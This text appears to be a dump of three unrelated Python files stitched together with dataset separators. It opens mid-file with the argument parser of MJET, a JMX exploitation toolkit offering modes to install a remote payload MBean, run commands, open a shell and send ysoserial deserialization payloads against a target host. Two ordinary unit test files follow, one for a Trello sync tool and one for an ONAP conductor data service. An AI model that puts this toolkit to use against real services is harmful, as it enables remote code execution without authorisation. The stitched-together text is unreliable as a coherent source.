def arg_shell_mode(args):
shellMode(args)
def arg_password_mode(args):
changePasswordMode(args)
def arg_uninstall_mode(args):
uninstallMode(args)
def arg_webserver_mode(args):
webserverMode(args)
def arg_deserialization_mode(args):
deserializationMode(args)
# print header
print ""
print authorSignature
# Base parser
parser = argparse.ArgumentParser(description = 'MJET allows an easy exploitation of insecure JMX services', epilog='--- MJET - MOGWAI LABS JMX Exploitation Toolkit ------------------', add_help=True)
parser.add_argument('targetHost', help='target IP address')
parser.add_argument('targetPort', help='target JMX service port')
parser.add_argument('--jmxrole', help='remote JMX role')
parser.add_argument('--jmxpassword', help='remote JMX password')
subparsers = parser.add_subparsers(title='modes', description='valid modes', help='use ... MODE -h for help about specific modes')
# Install mode
install_subparser = subparsers.add_parser('install', help='install the payload MBean on the target')
install_subparser.add_argument('password', help="the password that should be set after successful installation")
install_subparser.add_argument('payload_url', help='URL to load the payload (full URL)')
install_subparser.add_argument('payload_port', help='port to load the payload')
install_subparser.set_defaults(func=arg_install_mode)
# Uninstall mode
uninstall_subparser = subparsers.add_parser('uninstall', help='uninstall the payload MBean from the target')
uninstall_subparser.set_defaults(func=arg_uninstall_mode)
# Password mode
password_subparser = subparsers.add_parser('changepw', help='change the payload password on the target')
password_subparser.add_argument('password', help="the password to access the installed MBean")
password_subparser.add_argument('newpass', help='The new password')
password_subparser.set_defaults(func=arg_password_mode)
# Command mode
command_subparser = subparsers.add_parser('command', help='execute a command in the target')
command_subparser.add_argument('password', help="the password to access the installed MBean")
command_subparser.add_argument('cmd', help='command to be executed')
command_subparser.set_defaults(func=arg_command_mode)
# Javascript mode
script_subparser = subparsers.add_parser('javascript', help='execute JavaScript code from a file in the target')
script_subparser.add_argument('password', help="the password to access the installed MBean")
script_subparser.add_argument('filename', help='file with the JavaScript code to be executed')
script_subparser.set_defaults(func=arg_script_mode)
# Shell mode
shell_subparser = subparsers.add_parser('shell', help='open a simple command shell in the target')
shell_subparser.add_argument('password', help="the required password to access the installed MBean")
shell_subparser.set_defaults(func=arg_shell_mode)
# Webserver mode
webserver_subparser = subparsers.add_parser('webserver', help='just run the MLET web server')
webserver_subparser.add_argument('payload_url', help='URL to load the payload (full URL)')
webserver_subparser.add_argument('payload_port', help='port to load the system')
webserver_subparser.set_defaults(func=arg_webserver_mode)
# Deserialization mode
deserialize_subparser = subparsers.add_parser('deserialize', help='send a ysoserial payload to the target')
deserialize_subparser.add_argument('gadget', help='gadget as provided by ysoserial, e.g., CommonsCollections6')
deserialize_subparser.add_argument('cmd', help='command to be executed')
deserialize_subparser.set_defaults(func=arg_deserialization_mode)
# Store the user args
args = parser.parse_args()
args.func(args)
| StarcoderdataPython |
1702555 | <filename>tests/test_sync_tool.py
import unittest
from nextactions.synctool import SyncTool
from nextactions.trello import Trello
from nextactions.board import Board
from nextactions.list import List
from nextactions.config import Config
from unittest.mock import MagicMock, call, patch
from nextactions.card import Card
class TestSyncTool(unittest.TestCase):
def setUp(self):
self.config = Config()
self.config.set('gtd_board_id', "123")
self.trello = Trello(self.config)
self.board = Board(self.trello, {'id': "123", 'name': "GTD"})
self.list = List(self.trello, {'id': "456", 'name': "Next Actions"})
self.trello.getBoardById = MagicMock(return_value=self.board)
self.board.getListByName = MagicMock(return_value=self.list)
self.sync_tool = SyncTool(self.config, self.trello)
def testGetNextActionCards(self):
self.board.getCards = MagicMock(return_value=[])
self.assertEqual(self.sync_tool.getNextActionCards(), [])
self.trello.getBoardById.assert_called_once_with("123")
self.board.getCards.assert_called_once()
@patch('nextactions.card.Card')
@patch('nextactions.card.Card')
def testGetNextActionCardsReturnsOnlyAutoGeneratedCards(self, normal,
auto):
normal.isAutoGenerated.return_value = False
auto.isAutoGenerated.return_value = True
self.board.getCards = MagicMock(return_value=[auto, normal])
results = self.sync_tool.getNextActionCards()
self.assertEqual(results, [auto])
@patch('nextactions.card.Card')
def testReset(self, card):
self.sync_tool.getNextActionCards = MagicMock(return_value=[card])
archived = self.sync_tool.reset()
card.archive.assert_called_once()
self.assertEqual(archived, [card])
@patch('nextactions.board.Board')
@patch('nextactions.list.List')
@patch('nextactions.card.Card')
def testGetProjectBoards(self, card, project_list, project_board):
self.board.getListByName = MagicMock(return_value=project_list)
card.getProjectBoard.return_value = project_board
project_list.getCards.return_value = [card]
self.assertEqual(self.sync_tool.getProjectBoards(), [project_board])
def testGetTopTodoCardsForNonExistentList(self):
self.board.getListByName = MagicMock(return_value=None)
self.sync_tool.getProjectBoards = MagicMock(return_value=[self.board])
self.assertEqual(self.sync_tool.getTopTodoCards(), [])
@patch('nextactions.list.List')
def testGetTopTodoCardsForEmptyList(self, project_list):
self.board.getListByName = MagicMock(return_value=project_list)
project_list.getTopCard.return_value = None
self.sync_tool.getProjectBoards = MagicMock(return_value=[self.board])
self.assertEqual(self.sync_tool.getTopTodoCards(), [])
@patch('nextactions.card.Card', autospec=True)
def testGetTopTodoCards(self, card):
boards = [self.board, self.board]
self.sync_tool.getProjectBoards = MagicMock(return_value=boards)
self.list.getCards = MagicMock(return_value=[card])
self.assertEqual(self.sync_tool.getTopTodoCards(), [card, card])
@patch('nextactions.card.Card', autospec=True)
def testSyncCard(self, card):
card.board_id = "123"
card.name = "Card"
card.url = "URL"
self.list.createCard = MagicMock()
self.sync_tool.syncCard(card)
self.list.createCard.assert_called_once_with(
"GTD - Card",
"URL\n\n" + Card.AUTO_GENERATED_TEXT
)
@patch('nextactions.card.Card', autospec=True)
def testSyncArchivesOldNextActions(self, card):
self.sync_tool.getNextActionCards = MagicMock(return_value=[card])
self.trello.getOwnedCards = MagicMock(return_value=[])
self.sync_tool.getTopTodoCards = MagicMock(return_value=[])
card.archive = MagicMock()
created, archived = self.sync_tool.sync()
card.archive.assert_called_once()
self.assertEqual(created, [])
self.assertEqual(archived, [card])
@patch('nextactions.card.Card')
@patch('nextactions.card.Card')
def testSyncIgnoresExistingNextActions(self, card, next_action_card):
next_action_card.linksTo.return_value = True
self.sync_tool.getNextActionCards = MagicMock(
return_value=[next_action_card]
)
self.trello.getOwnedCards = MagicMock(return_value=[])
self.sync_tool.getTopTodoCards = MagicMock(return_value=[card])
next_action_card.archive = MagicMock()
self.sync_tool.syncCard = MagicMock()
created, archived = self.sync_tool.sync()
next_action_card.archive.assert_not_called()
self.sync_tool.syncCard.assert_not_called()
self.assertEqual(created, [])
self.assertEqual(archived, [])
@patch('nextactions.card.Card')
@patch('nextactions.card.Card')
def testSyncCreatesNextActionCards(self, card1, card2):
self.sync_tool.getNextActionCards = MagicMock(return_value=[])
self.trello.getOwnedCards = MagicMock(return_value=[card1])
self.sync_tool.getTopTodoCards = MagicMock(return_value=[card2])
self.sync_tool.syncCard = MagicMock()
created, archived = self.sync_tool.sync()
self.sync_tool.syncCard.assert_has_calls([call(card1), call(card2)])
self.assertEqual(created, [card1, card2])
self.assertEqual(archived, [])
| StarcoderdataPython |
1625462 | #
# -------------------------------------------------------------------------
# Copyright (c) 2018 Intel Corporation Intellectual Property
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -------------------------------------------------------------------------
#
import copy
import json
import unittest
import uuid
import conductor.data.service as service
import mock
import stevedore
import yaml
from conductor.common.utils import conductor_logging_util as log_util
from conductor.data.plugins.inventory_provider import extensions as ip_ext
from conductor.data.plugins.service_controller import extensions as sc_ext
from conductor.data.plugins.vim_controller import extensions as vc_ext
from conductor.data.service import DataEndpoint
from oslo_config import cfg
class TestDataEndpoint(unittest.TestCase):
def setUp(self):
ip_ext_manager = (
ip_ext.Manager(cfg.CONF, 'conductor.inventory_provider.plugin'))
vc_ext_manager = (
vc_ext.Manager(cfg.CONF, 'conductor.vim_controller.plugin'))
sc_ext_manager = (
sc_ext.Manager(cfg.CONF, 'conductor.service_controller.plugin'))
self.data_ep = DataEndpoint(ip_ext_manager,
vc_ext_manager,
sc_ext_manager)
def tearDown(self):
pass
def test_get_candidate_location(self):
req_json_file = './conductor/tests/unit/data/candidate_list.json'
req_json_candidate = json.loads(open(req_json_file).read())
req_json = dict()
req_json['candidate'] = req_json_candidate['candidate_list'][0]
location = (32.897480, -97.040443)
self.assertEqual({'response': location, 'error': False},
self.data_ep.get_candidate_location(None, req_json))
req_json['candidate']['latitude'] = None
req_json['candidate']['longitude'] = None
self.assertEqual({'response': None, 'error': True},
self.data_ep.get_candidate_location(None,
req_json))
req_json['candidate'] = req_json_candidate['candidate_list'][1]
location = (40.7128, -74.0060)
self.assertEqual({'response': location, 'error': False},
self.data_ep.get_candidate_location(None, req_json))
def test_get_candidate_zone(self):
req_json_file = './conductor/tests/unit/data/candidate_list.json'
req_json_candidate = json.loads(open(req_json_file).read())
req_json = dict()
req_json['candidate'] = req_json_candidate['candidate_list'][0]
req_json['category'] = None
self.assertEqual({'response': None, 'error': True},
self.data_ep.get_candidate_zone(None, req_json))
req_json['category'] = 'region'
self.assertEqual({'response': 'DLLSTX55', 'error': False},
self.data_ep.get_candidate_zone(None, req_json))
req_json['category'] = 'complex'
self.assertEqual({'response': 'dalls_one', 'error': False},
self.data_ep.get_candidate_zone(None, req_json))
req_json['candidate'] = req_json_candidate['candidate_list'][1]
req_json['category'] = 'region'
self.assertEqual({'response': 'NYCNY55', 'error': False},
self.data_ep.get_candidate_zone(None, req_json))
@mock.patch.object(service.LOG, 'error')
@mock.patch.object(service.LOG, 'debug')
@mock.patch.object(stevedore.ExtensionManager, 'map_method')
def test_get_candidates_from_service(self, ext_mock, debug_mock,
error_mock):
req_json_file = './conductor/tests/unit/data/constraints.json'
req_json = yaml.safe_load(open(req_json_file).read())
candidate_list = req_json['candidate_list']
ext_mock.return_value = [candidate_list]
self.maxDiff = None
self.assertEqual(2, len(
self.data_ep.get_candidates_from_service(None, req_json)))
req_json['controller'] = 'APP-C'
self.assertEqual({'response': [], 'error': False},
self.data_ep.get_candidates_from_service(None,
req_json))
def test_get_candidate_discard_set(self):
req_json_file = './conductor/tests/unit/data/constraints.json'
req_json = yaml.safe_load(open(req_json_file).read())
value_attrib = 'complex_name'
value = req_json['properties']['evaluate'][value_attrib]
candidate_list = req_json['candidate_list']
self.assertEqual(3, len(self.data_ep.get_candidate_discard_set(value,
candidate_list,
value_attrib)))
value_attrib = 'region'
value = req_json['properties']['evaluate'][value_attrib]
self.assertEqual(0, len(self.data_ep.get_candidate_discard_set(value,
candidate_list,
value_attrib)))
def test_get_candidate_discard_set_by_cloud_region(self):
req_json_file = './conductor/tests/unit/data/constraints.json'
req_json = yaml.safe_load(open(req_json_file).read())
value_attrib = 'location_id'
value = req_json['properties']['evaluate']['cloud-region']
candidate_list = req_json['candidate_list']
self.assertEqual(2, len(
self.data_ep.get_candidate_discard_set_by_cloud_region(value,
candidate_list,
value_attrib)))
@mock.patch.object(service.LOG, 'error')
@mock.patch.object(service.LOG, 'debug')
@mock.patch.object(service.LOG, 'info')
@mock.patch.object(stevedore.ExtensionManager, 'map_method')
@mock.patch.object(stevedore.ExtensionManager, 'names')
def test_get_inventory_group_candidates(self, ext2_mock, ext1_mock,
info_mock, debug_mock, error_mock):
ext1_mock.return_value = None
req_json_file = './conductor/tests/unit/data/constraints.json'
req_json = yaml.safe_load(open(req_json_file).read())
self.assertEqual({'response': [], 'error': True},
self.data_ep.get_inventory_group_candidates(None,
arg=req_json))
ext1_mock.return_value = [None]
self.assertEqual({'response': [], 'error': True},
self.data_ep.get_inventory_group_candidates(None,
arg=req_json))
pairs = [['instance-1', 'instance-2']]
ext1_mock.return_value = [pairs]
ext2_mock.return_value = ['aai']
candidate_list = req_json['candidate_list']
expected_candidate_list = [c for c in candidate_list
if c["candidate_id"] == 'instance-1']
self.assertEqual({'response': expected_candidate_list, 'error': False},
self.data_ep.get_inventory_group_candidates(None,
arg=req_json))
@mock.patch.object(service.LOG, 'error')
@mock.patch.object(service.LOG, 'debug')
@mock.patch.object(service.LOG, 'info')
@mock.patch.object(stevedore.ExtensionManager, 'map_method')
@mock.patch.object(stevedore.ExtensionManager, 'names')
def test_get_candidates_by_attributes(self, ext_mock2, ext_mock1,
info_mock, debug_mock, error_mock):
req_json_file = './conductor/tests/unit/data/constraints.json'
req_json = yaml.safe_load(open(req_json_file).read())
candidate_list = req_json['candidate_list']
ext_mock1.side_effect = ip_ext_sideeffect
ext_mock2.return_value = ['aai']
self.maxDiff = None
expected_response = {'response': [candidate_list[0]], 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_by_attributes(None,
req_json))
req_json['properties']['evaluate']['network_roles'] = {"all": []}
expected_response = {'response': [candidate_list[0]], 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_by_attributes(None,
req_json))
req_json['properties']['evaluate']['network_roles'] = {"any": []}
expected_response = {'response': [candidate_list[0]], 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_by_attributes(None,
req_json))
req_json['properties']['evaluate']['network_roles'] = {
"all": ['role-1']}
expected_response = {'response': [], 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_by_attributes(None,
req_json))
req_json['properties']['evaluate']['network_roles'] = {
"all": ['role-2']}
expected_response = {'response': [], 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_by_attributes(None,
req_json))
@mock.patch.object(service.LOG, 'error')
@mock.patch.object(service.LOG, 'debug')
@mock.patch.object(service.LOG, 'info')
@mock.patch.object(log_util, 'getTransactionId')
@mock.patch.object(stevedore.ExtensionManager, 'map_method')
def test_resolve_demands(self, ext_mock, logutil_mock, info_mock,
debug_mock,
error_mock):
self.maxDiff = None
req_json_file = './conductor/tests/unit/data/demands.json'
req_json = yaml.safe_load(open(req_json_file).read())
ctxt = {
'plan_id': uuid.uuid4(),
'keyspace': cfg.CONF.keyspace
}
logutil_mock.return_value = uuid.uuid4()
ext_mock.return_value = []
expected_response = {'response': {'resolved_demands': None, 'trans': {'plan_id': None,
'plan_name': None,
'translator_triage': []}},
'error': True}
self.assertEqual(expected_response,
self.data_ep.resolve_demands(ctxt, req_json))
return_value = req_json['demands']['vG']
ext_mock.return_value = [return_value]
expected_response = { 'error': False, 'response':
{ 'resolved_demands':
[{ 'attributes':
{ 'customer-id': 'some_company', 'provisioning-status': 'provisioned' },
'inventory_provider': 'aai', 'inventory_type': 'service', 'service_type': 'vG' },
{ 'inventory_provider': 'aai', 'inventory_type': 'cloud' } ],
'trans': { 'plan_id': 'plan_abc', 'plan_name': 'plan_name', 'translator_triage': [ [] ] } } }
self.assertEqual(expected_response,
self.data_ep.resolve_demands(ctxt, req_json))
@mock.patch.object(service.LOG, 'error')
@mock.patch.object(service.LOG, 'debug')
@mock.patch.object(service.LOG, 'info')
@mock.patch.object(log_util, 'getTransactionId')
@mock.patch.object(stevedore.ExtensionManager, 'map_method')
def test_resolve_vfmodule_demands(self, ext_mock, logutil_mock, info_mock,
debug_mock,
error_mock):
self.maxDiff = None
req_json_file = './conductor/tests/unit/data/demands_vfmodule.json'
req_json = yaml.safe_load(open(req_json_file).read())
ctxt = {
'plan_id': uuid.uuid4(),
'keyspace': cfg.CONF.keyspace
}
logutil_mock.return_value = uuid.uuid4()
return_value = req_json['demands']['vFW-SINK']
ext_mock.return_value = [return_value]
expected_response = \
{'response': {'trans': {'translator_triage': [ [] ], 'plan_name': 'plan_name', 'plan_id': 'plan_abc'},
'resolved_demands': [{'service_resource_id': 'vFW-SINK-XX', 'vlan_key': 'vlan_key',
'inventory_provider': 'aai', 'inventory_type': 'vfmodule',
'excluded_candidates': [
{'candidate_id': 'e765d576-8755-4145-8536-0bb6d9b1dc9a',
'inventory_type': 'vfmodule'
}], 'port_key': 'vlan_port', 'service_type': 'vFW-SINK-XX',
'attributes': {'global-customer-id': 'Demonstration',
'cloud-region-id': {'get_param': 'chosen_region'},
'model-version-id':
'763731df-84fd-494b-b824-01fc59a5ff2d',
'prov-status': 'ACTIVE',
'service_instance_id': {'get_param': 'service_id'},
'model-invariant-id':
'e7227847-dea6-4374-abca-4561b070fe7d',
'orchestration-status': ['active']
}
}]
}, 'error': False}
self.assertEqual(expected_response,
self.data_ep.resolve_demands(ctxt, req_json))
@mock.patch.object(service.LOG, 'error')
@mock.patch.object(service.LOG, 'info')
@mock.patch.object(stevedore.ExtensionManager, 'names')
@mock.patch.object(stevedore.ExtensionManager, 'map_method')
def test_get_candidates_with_hpa(self, hpa_mock, ext_mock1,
info_mock, error_mock):
req_json_file = './conductor/tests/unit/data/candidate_list.json'
hpa_json_file = './conductor/tests/unit/data/hpa_constraints.json'
hpa_json = yaml.safe_load(open(hpa_json_file).read())
req_json = yaml.safe_load(open(req_json_file).read())
candidate_list = req_json['candidate_list']
(constraint_id, constraint_info) = \
hpa_json["conductor_solver"]["constraints"][0].items()[0]
hpa_constraint = constraint_info['properties']
flavorProperties = hpa_constraint['evaluate'][0]['flavorProperties']
id = hpa_constraint['evaluate'][0]['id']
type = hpa_constraint['evaluate'][0]['type']
directives = hpa_constraint['evaluate'][0]['directives']
attr = directives[0].get("attributes")
label_name = attr[0].get("attribute_name")
ext_mock1.return_value = ['aai']
flavor_info = {"flavor-id": "vim-flavor-id1",
"flavor-name": "vim-flavor-name1"}
directive = [
{
"id": id,
"type": type,
"directives": directives
}
]
hpa_mock.return_value = [flavor_info]
self.maxDiff = None
args = generate_args(candidate_list, flavorProperties, id, type, directives)
hpa_candidate_list = copy.deepcopy(candidate_list)
hpa_candidate_list[1]['flavor_map'] = {}
hpa_candidate_list[1]['flavor_map'][label_name] = "vim-flavor-name1"
hpa_candidate_list[1]['all_directives'] = {}
hpa_candidate_list[1]['all_directives']['directives'] = directive
hpa_candidate_list1 = []
hpa_candidate_list1.append(hpa_candidate_list[0])
expected_response = {'response': hpa_candidate_list1, 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_with_hpa(None, args))
hpa_candidate_list2 = list()
hpa_candidate_list2.append(copy.deepcopy(candidate_list[0]))
args = generate_args(candidate_list, flavorProperties, id, type, directives)
hpa_mock.return_value = []
expected_response = {'response': hpa_candidate_list2, 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_with_hpa(None, args))
flavor_info = {}
hpa_mock.return_value = [flavor_info]
expected_response = {'response': hpa_candidate_list2, 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_with_hpa(None, args))
flavor_info = {"flavor-id": "vim-flavor-id1",
"flavor-name": ""}
hpa_mock.return_value = [flavor_info]
expected_response = {'response': hpa_candidate_list2, 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_with_hpa(None, args))
flavor_info = {"flavor-id": "vim-flavor-id1"}
hpa_mock.return_value = [flavor_info]
expected_response = {'response': hpa_candidate_list2, 'error': False}
self.assertEqual(expected_response,
self.data_ep.get_candidates_with_hpa(None, args))
@mock.patch.object(service.LOG, 'warn')
@mock.patch.object(service.LOG, 'info')
@mock.patch.object(stevedore.ExtensionManager, 'names')
@mock.patch.object(stevedore.ExtensionManager, 'map_method')
def test_get_candidates_with_vim_capacity(self, vim_mock, ext_mock1,
info_mock, warn_mock):
req_json_file = './conductor/tests/unit/data/candidate_list.json'
hpa_json_file = './conductor/tests/unit/data/hpa_constraints.json'
hpa_json = yaml.safe_load(open(hpa_json_file).read())
req_json = yaml.safe_load(open(req_json_file).read())
candidate_list = req_json['candidate_list']
ext_mock1.return_value = ['MultiCloud']
(constraint_id, constraint_info) = \
hpa_json["conductor_solver"]["constraints"][2].items()[0]
vim_request = constraint_info['properties']['request']
ctxt = {}
candidate_list_copy = list(copy.deepcopy(candidate_list))
args = {"candidate_list": [candidate_list_copy[1]],
"request": vim_request}
vim_mock.return_value = [['att-aic_NYCNY55']]
self.assertEqual({'response': [candidate_list[1]], 'error': False},
self.data_ep.get_candidates_with_vim_capacity(ctxt,
args))
vim_mock.return_value = []
self.assertEqual({'response': [candidate_list[1]], 'error': True},
self.data_ep.get_candidates_with_vim_capacity(ctxt,
args))
vim_mock.return_value = [None]
self.assertEqual({'response': [candidate_list[1]], 'error': True},
self.data_ep.get_candidates_with_vim_capacity(ctxt,
args))
vim_mock.return_value = None
self.assertEqual({'response': [candidate_list[1]], 'error': True},
self.data_ep.get_candidates_with_vim_capacity(ctxt,
args))
vim_mock.return_value = [[]]
self.assertEqual({'response': [], 'error': False},
self.data_ep.get_candidates_with_vim_capacity(ctxt,
args))
def generate_args(candidate_list, flavorProperties, vf_id, model_type, directives):
arg_candidate_list = copy.deepcopy(candidate_list)
args = {"candidate_list": arg_candidate_list,
"flavorProperties": flavorProperties,
"id": vf_id,
"type": model_type,
"directives": directives}
return args
def ip_ext_sideeffect(*args, **kwargs):
req_json_file = './conductor/tests/unit/data/constraints.json'
req_json = yaml.safe_load(open(req_json_file).read())
candidate_list = req_json['candidate_list']
if args[0] == 'check_network_roles':
if kwargs['network_role_id'] == 'role-1':
return None
else:
return ['DLLSTX55']
elif args[0] == 'check_candidate_role':
return ['candidate-role0']
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.